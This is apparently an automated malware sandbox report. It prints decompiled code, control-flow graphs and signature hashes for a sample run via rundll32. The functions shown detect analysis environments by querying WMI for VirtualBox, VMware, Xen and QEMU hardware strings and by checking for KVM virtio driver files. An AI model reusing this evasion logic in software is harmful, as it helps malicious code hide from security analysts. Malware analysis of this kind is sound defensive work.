                                        			E000001C31C33871F300(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                                        				long long _v24;
                                        				long long _v32;
                                        				long long _v40;
                                        				intOrPtr _v56;
                                        				signed short _v64;
                                        				void* _v72;
                                        				long long _v80;
                                        				long long _v88;
                                        				void* _t53;
                                        				void* _t54;
                                        				signed char _t60;
                                        				intOrPtr _t98;
                                        				intOrPtr* _t114;
                                        				long long _t134;
                                        				long long _t135;
                                        				void* _t146;
                                        
                                        				_t135 = __rsi;
                                        				_a24 = _t134;
                                        				_v72 = _t134;
                                        				_a16 = _t134;
                                        				_t54 = E000001C31C3387211C0(_t53,  &_a24,  &_v72, __rsi); // executed
                                        				if (_t54 == 0) goto 0x3871f50b;
                                        				_v24 = __rbx;
                                        				_v32 = _t135;
                                        				_v40 = __r14;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				_t9 = _t134 + 1; // 0x1
                                        				r14d = _t9;
                                        				_t104 = __rax;
                                        				if (__rax == 0) goto 0x3871f3ba;
                                        				if (__rax == 0) goto 0x3871f3b1;
                                        				_v80 =  &_a16;
                                        				_t13 = _t134 + 0x30; // 0x30
                                        				r9d = _t13;
                                        				_v88 = _t134;
                                        				_t145 =  *_a24;
                                        				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x3871f3b1;
                                        				r14d = 0;
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v72 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				_t137 = _v32;
                                        				if (__rax == 0) goto 0x3871f3cd;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0x3871f4fd;
                                        				_t114 = _a16;
                                        				_a32 = _t134;
                                        				_a8 = 0;
                                        				if (_t114 == 0) goto 0x3871f4d6;
                                        				asm("o16 nop [eax+eax]");
                                        				_v88 =  &_a8;
                                        				r8d = 1; // executed
                                        				 *((intOrPtr*)( *_t114 + 0x20))();
                                        				if (_a8 == 0) goto 0x3871f4d2;
                                        				_v80 = _t134;
                                        				r8d = 0;
                                        				_v88 = _t134;
                                        				_t98 =  *_a32; // executed
                                        				if ( *((intOrPtr*)(_t98 + 0x20))() < 0) goto 0x3871f4b9;
                                        				_t60 = _v64 & 0x0000ffff;
                                        				if (_t60 == 1) goto 0x3871f4b9;
                                        				if ((_t60 & 0x00000008) == 0) goto 0x3871f4af;
                                        				E000001C31C33880E5B0(__rax, _v56, L"82801FB", _v32,  *_a24, _t146);
                                        				if (_t98 != 0) goto 0x3871f4ad;
                                        				E000001C31C33880E5B0(_t104, _v56, L"82441FX", _v32, _t145, _t146);
                                        				if (_t98 != 0) goto 0x3871f4ad;
                                        				E000001C31C33880E5B0(_t104, _v56, L"82371SB", _v32, _t145, _t146);
                                        				if (_t98 != 0) goto 0x3871f4ad;
                                        				E000001C31C33880E5B0(_t104, _v56, L"OpenHCD", _t137, _t145, _t146);
                                        				if (_t98 == 0) goto 0x3871f4af;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				if (_a16 != 0) goto 0x3871f400;
                                        				goto 0x3871f4d6;
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v72 + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				dil = 1 - 3 >= 0;
                                        				return 0;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Stringwcsstr$AllocFreeUninitialize$ClearInitializeVariant
                                        • String ID: 82371SB$82441FX$82801FB$Name$OpenHCD$SELECT * FROM Win32_PnPEntity$WQL
                                        • API String ID: 1414631806-1350769890
                                        • Opcode ID: 75e4b6060b89eb8ce9141b0134c110ababce2369b9deacf8eb005bb6c1104aa2
                                        • Instruction ID: 73c1968a487cbf0177487994f5b827a7441eb78b3f85f7a2c26c79ddb12dcacc
                                        • Opcode Fuzzy Hash: 75e4b6060b89eb8ce9141b0134c110ababce2369b9deacf8eb005bb6c1104aa2
                                        • Instruction Fuzzy Hash: 2F614E32341B8086FB119F25E494ADC77A5FB84B98F04A513EE6E47B69DF38C646C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocClearFreeUninitializeVariant$Initialize
                                        • String ID: HVM domU$Model$SELECT * FROM Win32_ComputerSystem$VMWare$VirtualBox$WQL
                                        • API String ID: 4173814494-4167877488
                                        • Opcode ID: f13186b3c8aa9554891e6f494d136dfc83b806f2ae06a96f91c01f0200a4991e
                                        • Instruction ID: 441a20fcbfe5936fca7bada3cf7faac1d39889a9d74d453e61434eecf19c50c0
                                        • Opcode Fuzzy Hash: f13186b3c8aa9554891e6f494d136dfc83b806f2ae06a96f91c01f0200a4991e
                                        • Instruction Fuzzy Hash: 4C511636241B9186FB10DF25E884A9C77B1F788B88F45A116DE6E47B68DF38C688C711
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 48%
                                        			E000001C31C338720370(long long __rbx, signed long long __rdi, long long __rsi) {
                                        				signed char _t59;
                                        				void* _t66;
                                        				void* _t74;
                                        				void* _t78;
                                        				signed long long _t91;
                                        				signed long long _t105;
                                        				void* _t126;
                                        				signed long long _t131;
                                        				WCHAR* _t136;
                                        				void* _t139;
                                        				signed long long _t140;
                                        				void* _t142;
                                        
                                        				_t131 = __rdi;
                                        				 *((long long*)(_t139 + 8)) = __rbx;
                                        				 *((long long*)(_t139 + 0x10)) = __rsi;
                                        				 *((long long*)(_t139 + 0x18)) = __rdi;
                                        				_t137 = _t139 - 0x5b0;
                                        				_t140 = _t139 - 0x6b0;
                                        				_t91 =  *0x38903000; // 0x9bfaf736ae76
                                        				 *(_t139 - 0x5b0 + 0x5a0) = _t91 ^ _t140;
                                        				 *((long long*)(_t140 + 0x30)) = L"System32\\drivers\\balloon.sys";
                                        				r8d = 0x208;
                                        				 *((long long*)(_t140 + 0x38)) = L"System32\\drivers\\netkvm.sys";
                                        				 *((long long*)(_t140 + 0x40)) = L"System32\\drivers\\pvpanic.sys";
                                        				 *((long long*)(_t140 + 0x48)) = L"System32\\drivers\\viofs.sys";
                                        				 *((long long*)(_t140 + 0x50)) = L"System32\\drivers\\viogpudo.sys";
                                        				 *((long long*)(_t140 + 0x58)) = L"System32\\drivers\\vioinput.sys";
                                        				 *((long long*)(_t140 + 0x60)) = L"System32\\drivers\\viorng.sys";
                                        				 *((long long*)(_t140 + 0x68)) = L"System32\\drivers\\vioscsi.sys";
                                        				 *((long long*)(_t140 + 0x70)) = L"System32\\drivers\\vioser.sys";
                                        				 *((long long*)(_t140 + 0x78)) = L"System32\\drivers\\viostor.sys";
                                        				E000001C31C33880E410(_t66, 0, _t74, _t78, _t139 - 0x5b0 + 0x190, _t126, __rdi, _t142);
                                        				r8d = 0x208;
                                        				E000001C31C33880E410(_t66, 0, _t74, _t78, _t139 - 0x530, _t126, _t131, _t142);
                                        				 *(_t140 + 0x28) = _t131;
                                        				GetWindowsDirectoryW(_t136);
                                        				if (E000001C31C338720E50() == 0) goto 0x3872046a;
                                        				__imp__Wow64DisableWow64FsRedirection();
                                        				_t105 = _t131;
                                        				__imp__PathCombineW();
                                        				r8d = 0x200;
                                        				E000001C31C33880E410(_t66, 0, 0, _t78, _t137 + 0x3a0, _t137 + 0x190, _t131,  *((intOrPtr*)(_t140 + 0x30 + _t105 * 8)));
                                        				0x3871e130();
                                        				_t59 = GetFileAttributesW(??); // executed
                                        				if (_t59 == 0xffffffff) goto 0x387204c9;
                                        				if ((_t59 & 0x00000010) == 0) goto 0x387204d4;
                                        				if (_t105 + 1 - 0xa < 0) goto 0x38720470;
                                        				goto 0x387204d9;
                                        				 *((intOrPtr*)(_t140 + 0x20)) = 0;
                                        				if ( *0x38904490 == 8) goto 0x38720502;
                                        				if (1 - 0x1e < 0) goto 0x387204f0;
                                        				goto 0x38720561;
                                        				if ( *0x1C3389044E4 == dil) goto 0x38720561;
                                        				if ( *0x38904490 == 8) goto 0x3872052a;
                                        				if (1 - 0x1e < 0) goto 0x38720518;
                                        				goto 0x3872053f;
                                        				if ( *((intOrPtr*)(0x1c3389044e4)) == dil) goto 0x3872053f;
                                        				GetCurrentProcess();
                                        				 *((long long*)( *0x1C3389044E8))();
                                        				if ( *((intOrPtr*)(_t140 + 0x20)) == 0) goto 0x38720561;
                                        				__imp__Wow64RevertWow64FsRedirection();
                                        				E000001C31C33880C290();
                                        				return 1;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                                        • String ID: Checking file %s $System32\drivers\balloon.sys$System32\drivers\netkvm.sys$System32\drivers\pvpanic.sys$System32\drivers\viofs.sys$System32\drivers\viogpudo.sys$System32\drivers\vioinput.sys$System32\drivers\viorng.sys$System32\drivers\vioscsi.sys$System32\drivers\vioser.sys$System32\drivers\viostor.sys
                                        • API String ID: 2137468328-3181514389
                                        • Opcode ID: 5d16ff1b976b14de94503c63726e21016d550f9cc417a117d5239c3075ee5e3c
                                        • Instruction ID: 5b607e48da16ebf8596ee077d1710be79725cbc00538d70a908981aa10fea76c
                                        • Opcode Fuzzy Hash: 5d16ff1b976b14de94503c63726e21016d550f9cc417a117d5239c3075ee5e3c
                                        • Instruction Fuzzy Hash: E051AE32250B8099FB21CB29E854BDA73A5F784784F84A127DEAD47BA4DF38C745C702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 990 1c33871f730-1c33871f762 call 1c3387211c0 993 1c33871f9a7-1c33871f9b4 990->993 994 1c33871f768-1c33871f7ae call 1c3388445f8 * 2 990->994 999 1c33871f805-1c33871f810 994->999 1000 1c33871f7b0-1c33871f7b3 994->1000 1001 1c33871f81b-1c33871f82b 999->1001 1002 1c33871f812-1c33871f815 SysFreeString 999->1002 1003 1c33871f7b5-1c33871f7d1 1000->1003 1004 1c33871f7fc-1c33871f7ff SysFreeString 1000->1004 1005 1c33871f994-1c33871f9a6 1001->1005 1006 1c33871f831-1c33871f856 1001->1006 1002->1001 1007 1c33871f7db-1c33871f7dd 1003->1007 1004->999 1008 1c33871f974-1c33871f98e CoUninitialize 1006->1008 1009 1c33871f85c 1006->1009 1007->1004 1010 1c33871f7df-1c33871f7f6 CoUninitialize 1007->1010 1008->1005 1011 1c33871f860-1c33871f87d 1009->1011 1010->1004 1015 1c33871f883-1c33871f89f 1011->1015 1016 1c33871f970 1011->1016 1019 1c33871f8a5-1c33871f8a7 1015->1019 1016->1008 1021 1c33871f8a9-1c33871f8ae 1019->1021 1022 1c33871f8d7-1c33871f923 1019->1022 1021->1022 1023 1c33871f8b0-1c33871f8b4 1021->1023 1028 1c33871f925-1c33871f92a 1022->1028 1029 1c33871f953-1c33871f95f 1022->1029 1024 1c33871f8b6-1c33871f8c9 call 1c33880e5b0 1023->1024 1025 1c33871f8cd-1c33871f8d1 VariantClear 1023->1025 1024->1025 1025->1022 1028->1029 1031 1c33871f92c-1c33871f930 1028->1031 1029->1016 1035 1c33871f961-1c33871f968 1029->1035 1033 1c33871f949-1c33871f94d VariantClear 1031->1033 1034 1c33871f932-1c33871f945 call 1c33880e5b0 1031->1034 1033->1029 1034->1033 1035->1011 1038 1c33871f96e 1035->1038 1038->1008
                                        C-Code - Quality: 16%
                                        			E000001C31C33871F730(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14) {
                                        				void* __rbx;
                                        				void* _t74;
                                        				void* _t75;
                                        				void* _t93;
                                        				long long _t117;
                                        				long long _t119;
                                        				void* _t122;
                                        				intOrPtr* _t131;
                                        				long long _t156;
                                        				void* _t159;
                                        				void* _t160;
                                        				void* _t161;
                                        				void* _t168;
                                        				long long _t173;
                                        
                                        				_t156 = __rsi;
                                        				_t159 = _t160 - 0x47;
                                        				_t161 = _t160 - 0x90;
                                        				r15d = 0;
                                        				 *((long long*)(_t159 + 0x7f)) = _t173;
                                        				 *((long long*)(_t159 - 0x19)) = _t173;
                                        				 *((long long*)(_t159 + 0x77)) = _t173;
                                        				_t75 = E000001C31C3387211C0(_t74, _t159 + 0x7f, _t159 - 0x19, __rsi); // executed
                                        				if (_t75 == 0) goto 0x3871f9a7;
                                        				 *((long long*)(_t161 + 0x88)) = _t156;
                                        				 *((long long*)(_t161 + 0x80)) = __rdi;
                                        				 *((long long*)(_t161 + 0x78)) = __r12;
                                        				 *((long long*)(_t161 + 0x70)) = __r14;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				r12d = 1;
                                        				r14d = r12d;
                                        				if (__rax == 0) goto 0x3871f805;
                                        				if (__rax == 0) goto 0x3871f7fc;
                                        				 *((long long*)(_t161 + 0x28)) = _t159 + 0x77;
                                        				_t14 = _t173 + 0x30; // 0x30
                                        				r9d = _t14;
                                        				 *((long long*)(_t161 + 0x20)) = _t173;
                                        				_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f))));
                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0xa0))() >= 0) goto 0x3871f7fc;
                                        				r14d = r15d;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
                                        				_t117 =  *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19))));
                                        				 *((intOrPtr*)(_t117 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (__rax == 0) goto 0x3871f81b;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0x3871f994;
                                        				_t131 =  *((intOrPtr*)(_t159 + 0x77));
                                        				 *((long long*)(_t159 + 0x6f)) = _t173;
                                        				 *((intOrPtr*)(_t159 + 0x67)) = r15d;
                                        				 *(_t159 - 0x11) = r15w;
                                        				 *((long long*)(_t159 - 0xf)) = _t117;
                                        				 *((long long*)(_t159 - 7)) = _t117;
                                        				 *((intOrPtr*)(_t159 + 1)) = 0;
                                        				 *((short*)(_t159 + 5)) = 0;
                                        				if (_t131 == 0) goto 0x3871f974;
                                        				 *((long long*)(_t161 + 0x20)) = _t159 + 0x67;
                                        				r8d = r12d; // executed
                                        				 *((intOrPtr*)( *_t131 + 0x20))();
                                        				if ( *((intOrPtr*)(_t159 + 0x67)) == r15d) goto 0x3871f970;
                                        				 *((long long*)(_t161 + 0x28)) = _t173;
                                        				r8d = 0;
                                        				 *((long long*)(_t161 + 0x20)) = _t173;
                                        				_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))); // executed
                                        				 *((intOrPtr*)(_t119 + 0x20))();
                                        				if (0 < 0) goto 0x3871f8d7;
                                        				if ( *(_t159 - 0x11) == r12w) goto 0x3871f8d7;
                                        				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0x3871f8cd;
                                        				E000001C31C33880E5B0(_t122,  *((intOrPtr*)(_t159 - 9)), L"VirtualBox",  *((intOrPtr*)(_t161 + 0x88)),  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))), _t168);
                                        				_t92 =  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				 *(_t159 + 7) = r15w;
                                        				 *((long long*)(_t159 + 0x11)) = _t119;
                                        				 *((long long*)(_t159 + 9)) = _t119;
                                        				r8d = 0;
                                        				asm("movups xmm0, [ebp+0x7]");
                                        				 *((intOrPtr*)(_t159 + 0x19)) = 0;
                                        				 *((short*)(_t159 + 0x1d)) = 0;
                                        				asm("movsd xmm1, [ebp+0x17]");
                                        				asm("movups [ebp-0x11], xmm0");
                                        				 *((long long*)(_t161 + 0x28)) = _t173;
                                        				asm("movsd [ebp-0x1], xmm1");
                                        				 *((long long*)(_t161 + 0x20)) = _t173;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x20))();
                                        				if (0 < 0) goto 0x3871f953;
                                        				if ( *(_t159 - 0x11) == r12w) goto 0x3871f953;
                                        				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0x3871f949;
                                        				E000001C31C33880E5B0(_t122,  *((intOrPtr*)(_t159 - 9)), L"Oracle Corporation",  *((intOrPtr*)(_t161 + 0x88)), _t167, _t168);
                                        				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x10))();
                                        				if (_t93 != 0) goto 0x3871f970;
                                        				if ( *((intOrPtr*)(_t159 + 0x77)) != 0) goto 0x3871f860;
                                        				goto 0x3871f974;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x77)))) + 0x10))();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19)))) + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				return _t93;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocClearFreeUninitializeVariantwcsstr$Initialize
                                        • String ID: Manufacturer$Oracle Corporation$Product$SELECT * FROM Win32_BaseBoard$VirtualBox$WQL
                                        • API String ID: 1018877641-1142199694
                                        • Opcode ID: 45052863cfe297d0571556694e1f3448e50ac1587db9c284639e699be79b2aaf
                                        • Instruction ID: 156cbe7ad4cbf150603339684e34f9d69d9318866c6406197e7a1f29fd476b90
                                        • Opcode Fuzzy Hash: 45052863cfe297d0571556694e1f3448e50ac1587db9c284639e699be79b2aaf
                                        • Instruction Fuzzy Hash: 42810436641B80CAEB10DF39E4947AD33A5FB84B88F04A516DE6D87A68DF34C659C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1039 1c33871f520-1c33871f547 call 1c3387211c0 1042 1c33871f723-1c33871f72b 1039->1042 1043 1c33871f54d-1c33871f58d call 1c3388445f8 * 2 1039->1043 1048 1c33871f5e4-1c33871f5e7 1043->1048 1049 1c33871f58f-1c33871f592 1043->1049 1052 1c33871f5e9-1c33871f5ec SysFreeString 1048->1052 1053 1c33871f5f2-1c33871f5fa 1048->1053 1050 1c33871f594-1c33871f5b0 1049->1050 1051 1c33871f5db-1c33871f5de SysFreeString 1049->1051 1056 1c33871f5ba-1c33871f5bc 1050->1056 1051->1048 1052->1053 1054 1c33871f70b-1c33871f722 1053->1054 1055 1c33871f600-1c33871f612 1053->1055 1057 1c33871f618 1055->1057 1058 1c33871f6eb-1c33871f705 CoUninitialize 1055->1058 1056->1051 1059 1c33871f5be-1c33871f5d5 CoUninitialize 1056->1059 1060 1c33871f620-1c33871f63c 1057->1060 1058->1054 1059->1051 1064 1c33871f6dc 1060->1064 1065 1c33871f642-1c33871f660 1060->1065 1067 1c33871f6e0-1c33871f6e3 1064->1067 1069 1c33871f666-1c33871f668 1065->1069 1067->1058 1070 1c33871f6e5-1c33871f6e7 1067->1070 1072 1c33871f6c3-1c33871f6d4 1069->1072 1073 1c33871f66a-1c33871f672 1069->1073 1070->1058 1072->1060 1078 1c33871f6da 1072->1078 1073->1072 1074 1c33871f674-1c33871f676 1073->1074 1076 1c33871f6b9-1c33871f6bd VariantClear 1074->1076 1077 1c33871f678-1c33871f68b call 1c33880e5b0 1074->1077 1076->1072 1081 1c33871f6b7 1077->1081 1082 1c33871f68d-1c33871f6a0 call 1c33880e5b0 1077->1082 1078->1067 1081->1076 1082->1081 1085 1c33871f6a2-1c33871f6b5 call 1c33880e5b0 1082->1085 1085->1076 1085->1081
                                        C-Code - Quality: 26%
                                        			E000001C31C33871F520(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, long long __r15, char _a8, void* _a16, void* _a24, void* _a32) {
                                        				long long _v24;
                                        				long long _v32;
                                        				long long _v40;
                                        				long long _v48;
                                        				intOrPtr _v72;
                                        				signed short _v80;
                                        				void* _v88;
                                        				long long _v96;
                                        				long long _v104;
                                        				void* _t53;
                                        				void* _t54;
                                        				signed char _t60;
                                        				intOrPtr _t99;
                                        				intOrPtr* _t112;
                                        				long long _t133;
                                        				long long _t134;
                                        				void* _t145;
                                        
                                        				_t134 = __rsi;
                                        				_a24 = _t133;
                                        				_v88 = _t133;
                                        				_a16 = _t133;
                                        				_t54 = E000001C31C3387211C0(_t53,  &_a24,  &_v88, __rsi); // executed
                                        				if (_t54 == 0) goto 0x3871f723;
                                        				_v24 = __rbx;
                                        				_v32 = _t134;
                                        				_v40 = __r14;
                                        				_v48 = __r15;
                                        				__imp__#2();
                                        				_t135 = __rax;
                                        				__imp__#2();
                                        				r15d = 1;
                                        				_t102 = __rax;
                                        				r14d = r15d;
                                        				if (__rax == 0) goto 0x3871f5e4;
                                        				if (__rax == 0) goto 0x3871f5db;
                                        				_v96 =  &_a16;
                                        				_t13 = _t133 + 0x30; // 0x31
                                        				r9d = _t13;
                                        				_v104 = _t133;
                                        				_t144 =  *_a24;
                                        				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x3871f5db;
                                        				r14d = 0;
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (__rax == 0) goto 0x3871f5f2;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0x3871f70b;
                                        				_t112 = _a16;
                                        				_a32 = _t133;
                                        				_a8 = 0;
                                        				if (_t112 == 0) goto 0x3871f6eb;
                                        				_v104 =  &_a8;
                                        				r8d = r15d; // executed
                                        				 *((intOrPtr*)( *_t112 + 0x20))();
                                        				if (_a8 == 0) goto 0x3871f6dc;
                                        				_v96 = _t133;
                                        				r8d = 0;
                                        				_v104 = _t133;
                                        				_t99 =  *_a32; // executed
                                        				if ( *((intOrPtr*)(_t99 + 0x20))() < 0) goto 0x3871f6c3;
                                        				_t60 = _v80 & 0x0000ffff;
                                        				if (_t60 == r15w) goto 0x3871f6c3;
                                        				if ((_t60 & 0x00000008) == 0) goto 0x3871f6b9;
                                        				E000001C31C33880E5B0(__rax, _v72, L"ACPIBus_BUS_0", __rax,  *_a24, _t145);
                                        				if (_t99 != 0) goto 0x3871f6b7;
                                        				E000001C31C33880E5B0(_t102, _v72, L"PCI_BUS_0", _t135, _t144, _t145);
                                        				if (_t99 != 0) goto 0x3871f6b7;
                                        				E000001C31C33880E5B0(_t102, _v72, L"PNP_BUS_0", _t135, _t144, _t145);
                                        				if (_t99 == 0) goto 0x3871f6b9;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				if (_a16 != 0) goto 0x3871f620;
                                        				goto 0x3871f6e0;
                                        				if (1 != 3) goto 0x3871f6eb;
                                        				_t74 =  ==  ? r15d : 0;
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				_t68 =  ==  ? r15d : 0;
                                        				return  ==  ? r15d : 0;
                                        			}





















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$wcsstr$AllocFreeUninitialize$ClearInitializeVariant
                                        • String ID: ACPIBus_BUS_0$Name$PCI_BUS_0$PNP_BUS_0$SELECT * FROM Win32_Bus$WQL
                                        • API String ID: 2365594256-2399075642
                                        • Opcode ID: a083f4136500c1d7388cb6dbd791f7449bf228b3f2852ad9c909687787008122
                                        • Instruction ID: 2404ea713da3c42564c6ec1a169aad200dae07598c823d48dc9535199254a9c8
                                        • Opcode Fuzzy Hash: a083f4136500c1d7388cb6dbd791f7449bf228b3f2852ad9c909687787008122
                                        • Instruction Fuzzy Hash: 4B515B76340B8086FB108F25E844ADC67A5FB84B98F14A517DE6E47B69DF38C646C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1088 1c33871f120-1c33871f14d call 1c3387211c0 1091 1c33871f153-1c33871f193 call 1c3388445f8 * 2 1088->1091 1092 1c33871f2ec-1c33871f2f6 1088->1092 1097 1c33871f195-1c33871f198 1091->1097 1098 1c33871f1ea-1c33871f1f2 1091->1098 1099 1c33871f19a-1c33871f1b6 1097->1099 1100 1c33871f1e1-1c33871f1e4 SysFreeString 1097->1100 1101 1c33871f1f4-1c33871f1f7 SysFreeString 1098->1101 1102 1c33871f1fd-1c33871f20a 1098->1102 1107 1c33871f1c0-1c33871f1c2 1099->1107 1100->1098 1101->1102 1103 1c33871f2dc-1c33871f2eb 1102->1103 1104 1c33871f210-1c33871f21f 1102->1104 1105 1c33871f225-1c33871f22f 1104->1105 1106 1c33871f2b8-1c33871f2d6 CoUninitialize 1104->1106 1108 1c33871f230-1c33871f24d 1105->1108 1106->1103 1107->1100 1109 1c33871f1c4-1c33871f1db CoUninitialize 1107->1109 1108->1106 1113 1c33871f24f-1c33871f26b 1108->1113 1109->1100 1116 1c33871f271-1c33871f273 1113->1116 1118 1c33871f275-1c33871f27a 1116->1118 1119 1c33871f29d-1c33871f2a9 1116->1119 1120 1c33871f293-1c33871f297 VariantClear 1118->1120 1121 1c33871f27c-1c33871f28f call 1c33880e5b0 1118->1121 1119->1106 1124 1c33871f2ab-1c33871f2b2 1119->1124 1120->1119 1121->1120 1124->1106 1124->1108
                                        C-Code - Quality: 20%
                                        			E000001C31C33871F120(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                                        				long long _v32;
                                        				long long _v40;
                                        				long long _v48;
                                        				long long _v56;
                                        				intOrPtr _v72;
                                        				short _v80;
                                        				void* _v88;
                                        				long long _v96;
                                        				long long _v104;
                                        				void* __rbx;
                                        				void* _t49;
                                        				void* _t50;
                                        				void* _t63;
                                        				void* _t86;
                                        				intOrPtr* _t95;
                                        				long long _t115;
                                        				void* _t126;
                                        				long long _t131;
                                        
                                        				_t115 = __rsi;
                                        				r15d = 0;
                                        				_a16 = _t131;
                                        				_v88 = _t131;
                                        				_a24 = _t131;
                                        				_t50 = E000001C31C3387211C0(_t49,  &_a16,  &_v88, __rsi); // executed
                                        				if (_t50 == 0) goto 0x3871f2ec;
                                        				_v32 = _t115;
                                        				_v40 = __rdi;
                                        				_v48 = __r12;
                                        				_v56 = __r14;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				r12d = 1;
                                        				r14d = r12d;
                                        				if (__rax == 0) goto 0x3871f1ea;
                                        				if (__rax == 0) goto 0x3871f1e1;
                                        				_v96 =  &_a24;
                                        				_t13 = _t131 + 0x30; // 0x30
                                        				r9d = _t13;
                                        				_v104 = _t131;
                                        				if ( *((intOrPtr*)( *_a16 + 0xa0))() >= 0) goto 0x3871f1e1;
                                        				r14d = r15d;
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (__rax == 0) goto 0x3871f1fd;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0x3871f2dc;
                                        				_t95 = _a24;
                                        				_a32 = _t131;
                                        				_a8 = r15d;
                                        				if (_t95 == 0) goto 0x3871f2b8;
                                        				asm("o16 nop [eax+eax]");
                                        				_v104 =  &_a8;
                                        				r8d = r12d; // executed
                                        				 *((intOrPtr*)( *_t95 + 0x20))();
                                        				if (_a8 == r15d) goto 0x3871f2b8;
                                        				_v96 = _t131;
                                        				r8d = 0;
                                        				_v104 = _t131;
                                        				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0x3871f29d;
                                        				if (_v80 != 8) goto 0x3871f293;
                                        				E000001C31C33880E5B0(_t86, _v72, L"PCI\\VEN_80EE&DEV_CAFE", _v32,  *_a16, _t126);
                                        				_t63 =  !=  ? r12d : r15d;
                                        				__imp__#9();
